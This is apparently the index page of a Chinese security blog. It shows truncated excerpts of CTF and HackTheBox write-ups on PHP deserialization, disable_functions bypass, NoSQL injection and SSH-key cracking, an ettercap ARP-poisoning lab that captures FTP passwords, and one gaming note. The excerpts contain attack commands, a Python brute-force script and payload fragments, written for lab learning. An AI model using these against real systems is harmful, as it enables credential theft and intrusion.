prontosil's Blog

hackmewww.zip源码，审计之后看到两个很有意思的操作 根目录下的 init.php文件中 <?php//初始化整个页面error_reporting(0);//lib.php包括一些常见的函数include 'lib.php';session_save_path('session');ini_set('session.serialize_handler','php_serialize');session_start(); 但是在 core 目录下的 init.php 中 <?php//初始化整个页面#error_reporting(0);//lib.php包括一些常见的函数include '../lib.php';session_save_path('../session');ini_set('session.serialize_handler', 'php');session_start(); 用了两种不同的session处理方式 所以提交一个签名为 |O:4:"info":1:{s:5:"admin";i: ...

基础知识有一部分CTF题目，当你拿到webshell，蚁剑连接上去之后，却不能执行系统命令，这就是要绕过 disable_function 了 可以看到禁用了很多函数 apache_child_terminate,apache_setenv,chgrp,chmod,chown,curl_exec,curl_multi_exec,dl,exec,imap_mail,imap_open,ini_alter,ini_restore,ini_set,link,mail,openlog,parse_ini_file,passthru,pcntl_alarm,pcntl_exec,pcntl_fork,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_wait,pcntl_waitpid,pcntl_wstopsig,pcntl_wtermsig,popen,posix_kill,proc_get_status,proc ...

实验的网络拓扑结构：kali是攻击机，另外两台是靶机 任务一 使用nmap,ettercap进行网络侦查和密码嗅探ettercap使用 常用参数 -l 显示可用网卡 -i 选择网卡 -t 协议选择，tcp/udp/all -p 不进行毒化攻击，只用来嗅探 -F 载入过滤器文件 -V text 将数据包以文本形式显示在屏幕上 ettercap -Tzq 以命令行显示，只嗅探本地数据包，只显示捕捉到的用户名和密码以及其他信息 具体到这个实验，需要使用ettercap去捕获ftp登陆的用户名和口令。其中，192.168.1.3 开放了ftp端口，所以尝试多次之后 ettercap -i eth1 -Tq -L sniffeddata -M arp:remote //192.168.1.3/21// 然后就抓到密码了 ettercap过滤脚本学习： if (ip.proto == TCP && ip.dst != '192.1.1.200' && t ...

分析PHP 在反序列化时，对类中不存在的属性也会进行反序列化 这个点很神奇， 例题一<?phpfunction filter($string){ return preg_match('/x/','yy',$string);}$username = "peri0d";$password = "aaaaa";$user = array($username, $password);var_dump(serialize($user));echo '\n';$r = filter(serialize($user));var_dump($r);echo '\n';var_dump(unserialize($r)); 这里将 x 替换为 yy,也就是变长了，正常的序列化数据为 a:2:{i:0;s:6:"peri0d";i:1;s:5:"aaaaa";} 如果我们可以控制用户名去修改密码，那么应该是这样的 a:2:{i:0;s:6:"peri0d";i:1;s:6:" ...

完了一段的时间的文明六，（虽然才48个小时 总体感觉一开始玩这个游戏有点不知所措，因为这个游戏的信息量实在是太大了，后来慢慢地从别人的视频中才逐渐的熟悉起来。 文明六大概分为几个部分吧，首先是最基本的城市，可以建造区域，练兵，造工人，开拓者。然后是

信息收集nmap扫描结果 PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)| ssh-hostkey: | 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)80/tcp open ssl/http Apache|_http-generator: Drupal 7 (http://drupal.org)| http-robots.txt: 36 disallowed entries (15 shown)| /includes/ /misc&#x ...

信息收集22端口，80端口，443端口 这里改一下host staging-order.mango.htb 访问网站 user flag有点坑，是mongodb，nosql注入 参考爆破脚本 #!/usr/bin/env python import requests import string url = "http://staging-order.mango.htb/index.php" headers = {"Host": "staging-order.mango.htb"} cookies = {"PHPSESSID": "9k6j39np56td4vq3q4lg4eh95j"} possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ] def get_password(username): print("Extrac ...

信息收集22号端口和80号端口 看到http的信息是 nostromo,msf搜索exploit直接打 user flag由于是 nostromo 搭建的，根目录 在 /var/nostromo 查找conf目录 查看配置文件 nhttpd.conf 发现根目录是在 public_www 下是在家目录下，这个权限配置很有意思，你只能进去却看不到 下载压缩包下来 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz 解压之后就得到了私钥，但是尝试登陆还是需要密码 这里就需要爆破了 可以使用john，首先需要 python ssh2john.py id_rsa > rsacrack 转一下。但是这种方式太慢了，换一种，折耳根payload记一下 cat /usr/share/john/password.lst | while read pass; do if ssh-keygen -c -C "david@10.10.10.16 ...